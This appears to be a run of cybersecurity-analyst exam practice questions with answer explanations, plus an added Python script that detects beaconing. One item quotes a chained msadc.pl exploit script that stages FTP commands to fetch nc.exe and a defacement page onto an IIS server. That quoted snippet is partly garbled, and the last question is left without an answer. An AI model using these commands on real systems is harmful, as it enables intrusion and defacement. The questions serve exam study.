An infected workstation is attempting to reach a command and control server A call home message is an indicator of compromise known as beaconing. Beaconing usually begins after a stage 1 implant has been placed on an organization's workstation or server, but "malware is running" is not the most precise answer here. Beaconing specifically indicates that an infected host is trying to communicate with the attacker's command and control server, and it will continue at its set interval until the infected system is found and cleaned or until the attacker's infrastructure gives it further instructions (such as to attack). "Malware is running on a company workstation or server" is incorrect because the scenario gives no positive verification of that: a beacon does not have to be malware. It can be as simple as a ping or a DNS request sent out every day at a set time by the Windows Task Scheduler. Be careful on the exam to answer the question being asked and choose the "most" accurate answer. Since the call home signal originates on the internal network and tries to reach an external server, it cannot be evidence of an attacker performing reconnaissance against your workstations. Nothing in the question suggests an insider exfiltrating information either, since a call home message is generally tiny and carries no data.
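The detection behind the explanation above, as an added example that is not from the exam: beacons are machines talking on a timer, so the tell-tale in proxy or firewall logs is a source/destination pair whose connection attempts are evenly spaced. The script groups denied and allowed connections by pair and flags those whose inter-arrival gaps have a very low coefficient of variation. The log lines are constructed (an internal host retrying a dropped C2 connection about every 60 seconds, mixed with ordinary browsing); the addresses and hostnames are assumptions.

```python
"""Spot beaconing in proxy/firewall logs by looking for regular intervals.

Added example for the exam explanation above. LOG is constructed; the
addresses and host names are assumptions, not real indicators.
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy firewall log: time, action, src, dst, host header.
LOG = """\
2024-03-01T09:00:00Z DENY 10.0.8.15 198.51.100.23 update-cdn.example
2024-03-01T09:00:12Z ALLOW 10.0.8.15 93.184.216.34 www.example.com
2024-03-01T09:01:01Z DENY 10.0.8.15 198.51.100.23 update-cdn.example
2024-03-01T09:01:40Z ALLOW 10.0.9.7 93.184.216.34 www.example.com
2024-03-01T09:02:00Z DENY 10.0.8.15 198.51.100.23 update-cdn.example
2024-03-01T09:02:59Z DENY 10.0.8.15 198.51.100.23 update-cdn.example
2024-03-01T09:03:30Z ALLOW 10.0.8.15 93.184.216.34 www.example.com
2024-03-01T09:04:01Z DENY 10.0.8.15 198.51.100.23 update-cdn.example
2024-03-01T09:05:00Z DENY 10.0.8.15 198.51.100.23 update-cdn.example
2024-03-01T09:05:45Z ALLOW 10.0.9.7 93.184.216.34 www.example.com
2024-03-01T09:09:10Z ALLOW 10.0.8.15 93.184.216.34 www.example.com
"""


def parse_log(text):
    for line in text.splitlines():
        ts, action, src, dst, host = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), action, src, dst, host


def find_beacons(text, min_events=5, max_cv=0.1):
    """Return (src, dst) pairs whose connection attempts are suspiciously periodic.

    Periodicity is judged by the coefficient of variation (stdev / mean) of the
    gaps between attempts: timers are regular, people are not. min_events keeps
    two or three coincidental hits from looking like a pattern.
    """
    by_pair = defaultdict(list)
    for ts, _action, src, dst, _host in parse_log(text):
        by_pair[(src, dst)].append(ts)

    beacons = {}
    for pair, times in by_pair.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            beacons[pair] = {"period_s": round(mean, 1), "cv": round(cv, 3), "count": len(times)}
    return beacons


if __name__ == "__main__":
    for (src, dst), info in find_beacons(LOG).items():
        print(f"{src} -> {dst}: every {info['period_s']}s, {info['count']} attempts, cv={info['cv']}")
```

Real implants add jitter to their sleep time, so tune max_cv against your own baseline rather than assuming near-zero; the host 10.0.8.15 in the constructed log still stands out at a coefficient of variation around 0.02 even with a second or two of drift.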
An adversary compromises a web server in your network using a zero-day exploit and then uses it as a command and control (C2) server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illustrate? Exploitation Persistence Command and Control Impact
Command and Control In the MITRE ATT&CK framework, Command and Control is a stage that describes how an adversary communicates with systems under their control within a target network. Persistence involves methods an adversary might use to maintain access within a network, but doesn't represent the use of a C2 server. Exploitation is part of gaining initial access but does not describe the use of compromised systems for command and control. Impact describes the objective of the adversary, often disruptive actions like data destruction or defacement. The use of a C2 server is not an impact action.
A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system's kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network? Conduct an OS fingerprinting scan across the network Conduct a service discovery scan on the network Manually review the syslog server's logs Conduct a packet capture of data traversing the server network
Conduct an OS fingerprinting scan across the network By utilizing operating system fingerprinting with a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually reviewing the syslog server's logs would take too long and would not find servers that don't send their logs to the syslog server. Conducting a packet capture would only allow you to find the servers actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not effectively identify which servers are running which operating systems. For example, if you see that the Apache web service is running on port 80, that doesn't indicate whether Linux or Windows is the underlying operating system.
Which type of control aims to minimize the impact of a security incident after it occurs? Corrective control Detective control Preventive control Deterrent control
Corrective control Corrective controls are implemented to mitigate or limit the damage after a security incident has occurred. Detective controls are designed to discover or detect security incidents that have already occurred. Deterrent controls are designed to discourage potential attackers. Preventive controls are designed to prevent security incidents from occurring.
Which of the following frameworks is commonly used for sharing threat intelligence information in a standardized format? Structured Threat Information Expression (STIX) Python HyperText Markup Language (HTML) Structured Query Language (SQL)
Structured Threat Information Expression (STIX) STIX is a standardized language for representing and sharing threat intelligence. Python is a general-purpose programming language, not a framework for sharing threat intelligence. HTML is a language for creating web pages, not for sharing threat intelligence. SQL is a language for managing and manipulating databases, not for sharing threat intelligence.
Which of the following actions should be done FIRST after forensically imaging a hard drive for evidence in an investigation? Encrypt the image file to ensure it maintains data integrity Digitally sign the image file to provide non-repudiation of the collection Encrypt the source drive to ensure an attacker cannot modify its contents Create a hash digest of the source drive and the image file to ensure they match
Create a hash digest of the source drive and the image file to ensure they match The first thing that must be done after acquiring a forensic disk image is to create a hash digest of the source drive and destination image file to ensure they match. A critical step in the presentation of evidence will be to prove that analysis has been performed on an identical image to the data present on the physical media and that neither data set has been tampered with. The standard means of proving this is to create a cryptographic hash or fingerprint of the disk contents and any derivative images made from it. When comparing hash values, you need to use the same algorithm used to create the reference value. While encrypting the image files is a good security practice to maintain the data's confidentiality, it does not provide data integrity like a hash digest does. Once imaged, the source drive should not be altered or encrypted. Digitally signing the image file could serve the function of non-repudiation, but it is an uncommon practice and not required to be performed.
Among the following vulnerabilities, which one was reported as a "Top 10" due to its common occurrence and the potential severity of its impact? Spectre Attack SolarWinds SUNBURST Attack Cross-Site Scripting (XSS) Poodle Attack
Cross-Site Scripting (XSS) XSS vulnerabilities are widespread across web applications and can lead to serious consequences, such as user data theft, making this the correct answer. The Spectre attack was an impactful hardware vulnerability, but it's not typically categorized as a top 10 vulnerability. While the Poodle Attack was significant and impacted the SSL 3.0 protocol, it is not categorized as a top 10 widespread vulnerability. The SolarWinds SUNBURST was a severe, targeted supply chain attack, not a common vulnerability like XSS.
You are working as a junior cybersecurity analyst and utilize a SIEM to support investigations into ongoing incidents. The SIEM is configured to collect data from numerous sources across the network, including network sensors, routers, switches, firewalls, hosts, and servers. Unfortunately, due to the number of data sources, you have data about a particular event being detected by different sensors and devices. Which of the following must you ensure to make sense of all the data being collected by your SIEM before analyzing it? Data correlation Data retention Data recovery Data sanitization
Data correlation Data correlation is the first step in making sense of data from across numerous sensors. It ensures each piece of data is placed in context with the other pieces of data within the system. For example, if your IDS detected an incident, host logs were collected, and your packet capture system collected the network traffic, the SIEM could be used to correlate all three pieces of information from these different systems to allow an analyst to understand the event better. Data correlation allows an analyst to identify a pattern more clearly and take action. Data correlation should be performed as soon as the SIEM indexes the data.
As part of your organization's proactive threat hunting, you're considering gathering threat intelligence from the deep web and dark web. What could be a significant benefit of this approach? Eliminating all cyber threats Avoiding the need for other security measures Discovering potential threats before they impact your organization Increasing the organization's web presence
Discovering potential threats before they impact your organization Gathering threat intelligence from the deep web and dark web can help your organization identify emerging threats or planned attacks before they affect your network. Gathering threat intelligence from the deep web and dark web is not related to increasing an organization's web presence; it's about identifying potential cyber threats. While gathering intelligence can help identify and mitigate threats, it does not guarantee the elimination of all cyber threats. Gathering threat intelligence is a part of a broader security strategy and should be used in conjunction with other security measures, not in lieu of them.
You are the incident response team lead investigating a possible data breach at your company with 5 other analysts. A journalist contacts you and inquires about a press release from your company that indicates a breach has occurred. You quickly deny everything and then call the company's public relations officer to ask if a press release had been published, which it has not. Which of the following has likely occurred? Communication was limited to trusted parties Inadvertent release of information Release of PII and SPI Disclosing based on regulatory requirements
Inadvertent release of information It is most likely that an inadvertent release of information has occurred. This could have happened because communication was not limited to trusted parties or because information was shared amongst the analysts using insecure communication methods. Based on the scenario, we cannot tell if the data breach (if one has actually occurred) involved the release of PII or SPI. Part of any good communications plan is understanding that you may be required to disclose information based on regulatory requirements. When that disclosure occurs, it will usually be accompanied by a press release.
What is the primary importance of the 'Mean Time to Detect' (MTTD) metric in the context of incident response? It measures the effectiveness of detection mechanisms It calculates the total duration of the incident response process It determines the severity of an incident It gauges the impact of an incident on the organization
It measures the effectiveness of detection mechanisms The MTTD metric evaluates the efficiency of an organization's detection systems by measuring the time it takes to identify a potential incident. The MTTD metric does not directly measure the impact of an incident. It focuses on the detection capabilities of the organization. MTTD measures the time taken to detect an incident, not the severity of the incident. While MTTD contributes to the overall timeline of incident response, it specifically refers to the time from when an incident occurs to when it is detected, not the total duration of the response process.
You are reviewing the latest list of important web application security controls published by OWASP. Which of these items is LEAST likely to appear on that list? Leverage security frameworks and libraries Implement identity and authentication controls Implement appropriate access controls Obscure web interface locations
Obscure web interface locations The least likely option to appear in the list is to obscure web interface locations. This recommendation is based on security through obscurity and is not considered a good security practice. The other options are all considered best practices in designing web application security controls and creating software assurance in our programs.
requests you enter your social security number, date of birth, and email address to conduct a background check as part of the hiring process. Which of the following types of information have you been asked to provide? CUI PHI PII IP
PII Personally identifiable information (PII) is data used to identify, contact, or locate an individual. Information such as social security number (SSN), name, date of birth, email address, telephone number, street address, and biometric data is considered PII. Protected health information (PHI) refers to medical and insurance records, plus associated hospital and laboratory test results. Proprietary information or intellectual property (IP) is information created and owned by the company, typically about the products or services that they make or perform. Controlled Unclassified Information (CUI) is federal non-classified information that must be safeguarded by implementing a uniform set of requirements and information security controls directed at securing sensitive government information.
You are in the recovery steps of an incident response. Your analysis revealed that the attacker exploited an unpatched vulnerability on a public-facing web server as the initial intrusion vector in this incident. Which of the following mitigations should be implemented first during the recovery? Restrict shell commands per user or per host for least privilege purposes Disable unused user account and reset the administrator credentials Scan the network for additional instances of this vulnerability and patch the affected assets Restrict host access to peripheral protocols like USB and Bluetooth
Scan the network for additional instances of this vulnerability and patch the affected assets All of the options listed are the best security practices to implement before and after a detected intrusion, but scanning for additional instances of this vulnerability should be performed first. Often, an enterprise network uses the same baseline configuration for all servers and workstations. Therefore, if a vulnerability is exploited on one device (such as an insecure configuration), that same vulnerability could exist on many other assets across the network. During your recovery, you must identify if any other network systems share the same vulnerability and mitigate them. If you don't, the attacker could quickly reinfect your network by simply attacking another machine using the same techniques used during this intrusion. The other options listed are all examples of additional device hardening that should be conducted during recovery after you have identified the exploited vulnerability across the rest of the network.
Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend? Wait until next scheduled maintenance window to remediate the vulnerability Delay the remediation until the next major update of the SQL server occurs Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability Remediate the vulnerability immediately
Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability Jorge should recommend that emergency maintenance windows be scheduled for an off-peak time later in the day. Since the vulnerability is critical, it needs to be remediated or mitigated as quickly as possible. But, this also needs to be balanced against the business and operational needs. Therefore, we cannot simply remediate it immediately, as this would cause downtime for this public-facing server. It is also unreasonable to accept the risk until the next scheduled maintenance window since it is a critical vulnerability. Therefore, the best way to balance the risk of the vulnerability and the outage's risk is to schedule an emergency maintenance window and patch the server during that time.
Evaluate the following log entry:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on this log entry, which of the following statements are true? The packet was blocked inbound to the network An attempted connection to the telnet service was prevented Packets are being blocked inbound to and outbound from the network MAC filtering is enabled on the firewall The packet was blocked outbound from the network An attempted connection to the ssh service was prevented
The packet was blocked inbound to the network An attempted connection to the telnet service was prevented Firewall log formats will vary by vendor, but this example is a commonly used format from the Linux iptables firewall tool. This log starts with the date and time of the event and provides some key pieces of information. For example, the word "drop" shows the action this log entry recorded. In this case, the firewall dropped a packet due to an ACL rule being applied. You can also see that the packet was detected on the inbound connection over eth0, so we know that packets are being scanned and blocked when they are headed inbound to the network. Next, we see the MAC address of the source device of the packet, the source (SRC) IP address, and the destination (DST) IP address. Further down, we see the source (SPT) and destination (DPT) ports. In this case, the DPT is 23, which is the well-known port for telnet. Based on this single log entry, we cannot tell whether packets are also being blocked when they attempt to leave the network, or whether connections to the ssh service (port 22) are also being blocked.
While reviewing the configuration settings of your company's IIS web servers, you notice that directory browsing is enabled. This misconfiguration could potentially expose which of the following to an attacker? The private keys of your SSL certificates The structure and content of your web directories Your company's user email addresses Your company's financial records
The structure and content of your web directories If directory browsing is enabled on a web server, it can expose the structure and content of your web directories to an attacker, potentially revealing sensitive information or giving the attacker information that could be used to exploit the server. Enabling directory browsing does not expose the private keys of your SSL certificates, as these should be stored securely and not accessible through directory browsing. Unless your company's financial records are improperly stored in the web directories, enabling directory browsing on a web server should not expose them. Directory browsing on a web server typically wouldn't expose user email addresses unless they were stored unsecured in the web directories, which is a separate issue.
In a network vulnerability assessment report, several zero-day and critical vulnerabilities were discovered. Why might this necessitate immediate action? Because they indicate a need to hire more staff Because they signal a need to decrease the frequency of vulnerability assessments Because zero-day and critical vulnerabilities improve the system's performance These vulnerabilities present significant risk due to no current security fix being available
These vulnerabilities present significant risk due to no current security fix being available Zero-day and critical vulnerabilities are high-risk issues that can severely compromise a system's security. One example of a zero-day virus that caused significant havoc is the "WannaCry" ransomware. It exploited a vulnerability in the Windows operating system, spreading rapidly across networks and encrypting files, demanding ransom payments in exchange for decryption. These types of vulnerabilities are significant threats, not performance enhancers. While additional resources might be needed for vulnerability management, the presence of critical vulnerabilities doesn't directly indicate staffing needs. On the contrary, critical vulnerabilities might suggest a need for more frequent and thorough assessments.
You just completed an nmap scan against a workstation and received the following output:
-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-
# nmap diontraining012
Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports
PORT STATE
135/tcp open
139/tcp open
445/tcp open
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-
Based on these results, which of the following operating systems is most likely being run by this workstation? Windows Ubuntu CentOS macOS
Windows The workstation is most likely running a version of the Windows operating system. Port 139 and port 445 are associated with the SMB file and printer sharing service run by Windows. Since Windows 2000, the NetBIOS file and print sharing has been running over these ports on all Windows systems by default.
Consider the following REGEX search string:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following strings would NOT be included in the output of this search? 001.02.3.40 1.2.3.4 37.259.129.207 205.255.255.001
37.259.129.207 The \b delimiter indicates that we are looking for whole words for the complete string. The REGEX is made up of four identical repeating groups, (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?), each separated by an escaped period (\.). For now, let us refer to these groups as octets, like the ones used in Internet Protocol version 4 addresses. Each octet allows 25[0-5] OR (|) 2[0-4][0-9] OR a one- or two-digit number optionally (?) preceded by a 0 or 1, followed by a ".". Since the period is treated as a special character in REGEX, the escape character (\) is required for the symbol to act as a literal dot or period. This sequence repeats four times, allowing for all variations of normal IP addresses with octet values from 0 to 255. Since 259 is outside the range 0-255, it is rejected. More specifically, character strings starting with 25 must end with a digit between 0 and 5 (25[0-5]); therefore, 259 is rejected. Now, on exam day, if you received a question like this, you can try to figure out the pattern as explained above, or you can take the logical shortcut. The logical shortcut is to look at the answers first and see that they all look like IP addresses. Remember, grep and REGEX are used by a cybersecurity analyst to search logs for indicators of compromise (like an IP address), so don't be afraid to take a logical guess if you need to conserve time during your exam. So, which one isn't a valid IP address? Clearly, 37.259.129.207 is not a valid IP address, so if you had to guess as to what wouldn't be an output of this complex-looking command, you should guess that one!
A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company's security controls. Which DNS assessment technique would be classified as active? A DNS forward or reverse lookup A whois query A zone transfer Using maltego
A zone transfer DNS zone transfer, also sometimes known by the DNS query type that initiates it, AXFR, is a DNS transaction type. It is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers. DNS zone transfers are an active technique. Performing a whois query is a passive reconnaissance technique that queries the databases storing the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. Performing DNS forward and reverse lookups is an active technique that allows the resolution of names to IP addresses and IP addresses to names, though this can also be conducted as a passive technique. Maltego is used for open-source intelligence and forensics. It focuses on providing a library for data discovery from open sources and visualizing that information in a graph format suitable for link analysis and data mining. It collects this information passively since it can acquire the information from whois lookup servers, a DNS lookup tool using public DNS servers, or even emails and hostnames one can acquire from TheHarvester.
Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect if an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring? Trend Heuristic Behavior Anomaly
Behavior This is an example of behavior-based detection. Behavior-based detection (or statistical- or profile-based detection) means that the engine is trained to recognize baseline traffic or expected events associated with a user account or network device. Anything that deviates from this baseline (outside a defined level of tolerance) generates an alert. Heuristic analysis determines whether several observed data points constitute an indicator and whether related indicators make up an incident; this depends on a good understanding of the relationship between the observed indicators. Human analysts are typically good at interpreting context but work painfully slowly, in computer terms, and cannot hope to cope with the sheer volume of data and traffic generated by a typical network. Anomaly analysis is the process of defining an expected outcome or pattern for events and then identifying any events that do not follow these patterns. This is useful in tools and environments that enable you to set rules. Trend analysis is not used for detection but instead to better understand capacity and the system's normal baseline. Behavioral-based detection differs from anomaly-based detection. Behavioral-based detection records expected patterns concerning the entity being monitored (in this case, user logins). Anomaly-based detection prescribes the baseline for expected patterns based on its own observation of what normal looks like.
A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");
("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");
system("perl msadc.pl -h $host -C \"ftp \-s\:tempfile\"");
$o=; print "Opening FTP connection...\n";
sy
Chained exploit The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly that occurs when a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor.
You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security scanning software recommends that you remediate this by changing user authentication to port 636 wherever possible. What should you do? Change all devices and servers that support it to port 636 since encrypted services run by default on port 636 Mark this as a false positive in your audit report since the services that typically run on ports 389 and 636 are identical Conduct remediation actions to update encryption keys on each server to match port 636 Change all devices and servers that support it to port 636 since port 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks
Change all devices and servers that support it to port 636 since encrypted services run by default on port 636 LDAP can be run on either port 389 or port 636. Port 389 is the standard port for LDAP, but LDAP services typically run unencrypted over this port. Instead, you should change all devices and servers that can technically support the change to port 636, since LDAP services over port 636 are encrypted by default.
Jeff has been contacted by an external security company and told that they had found a copy of his company's proprietary source code on GitHub. Upon further investigation, Jeff has determined that his organization owns the repository where the source code is located. Which of the following mitigations should Jeff apply immediately? Investigate if the source code was downloaded Change the repository from public to private Delete the repository Reevaluate the organization's information management policies
Change the repository from public to private Jeff should immediately change the repository from public to private to prevent further exposure of the source code. Deleting the repository would also fix the issue but could compromise the company's ongoing business operations. Reevaluation of the company's information management policies should be done, but this is not as time-critical as changing the repository's public/private setting. Once the repository is configured to be private, then Jeff should investigate any possible compromises that may have occurred and reevaluate their policies.
You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ATTEMPT] target 192.168.1.142 - login "root" - pass "abcde" 1 of 10
[ATTEMPT] target 192.168.1.142 - login "root" - pass "efghi" 2 of 10
[ATTEMPT] target 192.168.1.142 - login "root" - pass "12345" 3 of 10
[ATTEMPT] target 192.168.1.142 - login "root" - pass "67890" 4 of 10
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of test is the penetration tester currently conducting? Conducting a brute force login attempt of a remote service on 192.168.1.142 Conducting a ping sweep of 192.168.1.142/24 Conducting a Denial of Service attack on 192.168.1.142 Conducting a port scan of 192.168.1.142
Conducting a brute force login attempt of a remote service on 192.168.1.142 The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username or find a hidden web page, or find the key used to encrypt a message, using a trial and error approach and hoping, eventually, to guess correctly. Port Scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor's actions. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.
When your credit card data is written to the customer invoicing system at Dion Training, the first 12 digits are replaced with an x before storing the data. Which of the following privacy methods is being used? Data masking Data minimization Anonymization Tokenization
Data masking Data masking can mean that all or part of a field's contents is redacted, by substituting all character strings with x, for example. Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate from the production database. An authorized query or app can retrieve the original value from the vault, if necessary, so tokenization is a reversible technique. Data minimization involves limiting data collection to only what is required to fulfill a specific purpose. Reducing what information is collected reduces the amount and type of information that must be protected. Data anonymization is the process of removing personally identifiable information from a data set so that the people whom the data describe remain anonymous.
Your organization is a financial services company. You have a team of security analysts who are responsible for gathering and analyzing intelligence about potential threats to your organization. The analysts recently published a report that identifies a new threat actor who is targeting financial services companies. The report includes information about the threat actor's tactics, techniques, and procedures (TTPs). In which phase of the security intelligence cycle will this information be provided to those who need to act on it? Dissemination Analysis Collection Feedback
Dissemination The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The final phase of the security intelligence cycle is feedback and review, which utilizes both intelligence producers and intelligence consumers' input. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle is developed.
Which of the following vulnerabilities was considered the MOST critical because of its potential for a high degree of impact and exploitability? Carbanak BlueSmack Heartbleed ROBOT Attack
Heartbleed The Heartbleed bug is a serious vulnerability in the OpenSSL cryptographic software library. It was first disclosed in April 2014 and allowed anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromised the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. The Heartbleed bug in OpenSSL could have serious consequences, such as private key theft, making it a critical vulnerability. Carbanak is a sophisticated malware that was used in a series of targeted attacks against financial institutions from 2013 to 2015. The malware was able to steal millions of dollars from banks in over 30 countries. While the Carbanak attacks were significant, they involved targeted phishing and advanced persistent threats (APTs), not a widespread vulnerability like Heartbleed. The ROBOT attack is a type of man-in-the-middle attack that can be used to steal sensitive information from a TLS-protected connection. The attack works by exploiting a vulnerability in the RSA encryption algorithm that is used to secure TLS connections. The ROBOT Attack was a significant vulnerability affecting the RSA encryption algorithm, but it didn't have the same level of impact or exploitability as Heartbleed. Bluesmack is a type of Denial-of-Service (DoS) attack that can be used to disable Bluetooth-enabled devices. The attack works by sending a specially crafted packet to the target device that causes it to crash or become unresponsive. While BlueSmack was a significant vulnerability affecting Bluetooth devices, it did not have the same global impact or exploitability as Heartbleed.
What containment technique is the strongest possible response to an incident? Segmentation Isolating affected systems Enumeration Isolating the attacker
Isolating affected systems Isolation involves removing an affected component from whatever larger environment it is a part of. This can be everything from removing a server from the network after it has been the target of a DoS attack to placing an application in a sandbox virtual machine (VM) outside of the host environments it usually runs on. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. Removal is not an industry term, but it would be a synonym for isolation. Enumeration is defined as the process of extracting user names, machine names, network resources, shares, and services from a system. Isolating the attacker would only stop their direct two-way communication and control of the affected system. However, it would not be the strongest possible response since there could be malicious code still running on your victimized machine.
How does timely and effective communication and reporting of vulnerabilities assist an organization in meeting the GDPR's requirement of reporting data breaches within 72 hours of detection? It facilitates quicker identification of vulnerabilities enabling prompt reporting to the supervisory authority It proves that the organization is immune to data breaches It ensures that all employees will always adhere to data protection regulations It guarantees all vulnerabilities will be fixed within 72 hours
It facilitates quicker identification of vulnerabilities enabling prompt reporting to the supervisory authority By identifying and addressing vulnerabilities promptly, the organization can more effectively manage incidents and meet the GDPR's 72-hour reporting requirement. Organizations that fail to report data breaches to the supervisory authority or to individuals affected by the breach may be subject to fines of up to €20 million or 4% of global annual turnover, whichever is greater. No organization is completely immune to data breaches, as new threats and vulnerabilities continuously evolve. While training and policies can encourage compliance, human errors or misconduct can still occur. While this would be ideal, the complexity of certain vulnerabilities may require more time for a comprehensive fix.
During your review of the firewall logs, you notice that an IP address from within your company's server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident? IP addresses and other network-related configurations were exfiltrated Raw financial information about the company was accessed PII of company employees and customers was exfiltrated Forensic review of the server required fallback to a less efficient service
PII of company employees and customers was exfiltrated If the PII (Personally Identifiable Information) of the company's employees or customers were exfiltrated or stolen during the compromise, this would increase the incident's impact assessment. Loss of PII is a big issue for corporations and one that might garner media attention. While all of the options presented here are bad things that could increase the impact assessment, loss of PII is considered the MOST likely to increase the impact dramatically. Depending on the company's size or organization, there may also be mandatory reporting requirements, fines, or restitution that must be paid.
You are reverse engineering a piece of malware recovered from a retailer's network for analysis. They found that the malicious code was extracting track data from their customer's credit cards during processing. Which of the following types of threats would you classify this malware as? Rootkit Ransomware POS malware Keylogger
POS malware Point-of-sale malware (POS malware) is a type of malicious software (malware) used by cybercriminals to target point-of-sale (POS) and payment terminals with the intent of obtaining credit card and debit card information (a card's track 1 or track 2 data and even the CVV code) through various man-in-the-middle attacks, that is, by intercepting the processing at the retail checkout point-of-sale system. Ransomware is a type of malware that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send it back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.
An attacker recently compromised an e-commerce website for a clothing store. Which of the following methods did the attacker use to harvest an account's cached credentials when the user logged into an SSO system? Pivoting Lateral movement Pass the hash Golden ticket
Pass the hash Pass the Hash (PtH) is the process of harvesting an account's cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.
As an incident response manager, you've just concluded an incident where an attacker was able to breach your network by exploiting an unpatched vulnerability. In reviewing the incident, you realize that alerts regarding the vulnerability were overlooked due to a high volume of alerts. What should be your immediate next step to prevent similar occurrences? Increase the alert volume to ensure nothing is missed Perform a root cause analysis Ignore the incident since it was resolved Hire more incident response team members
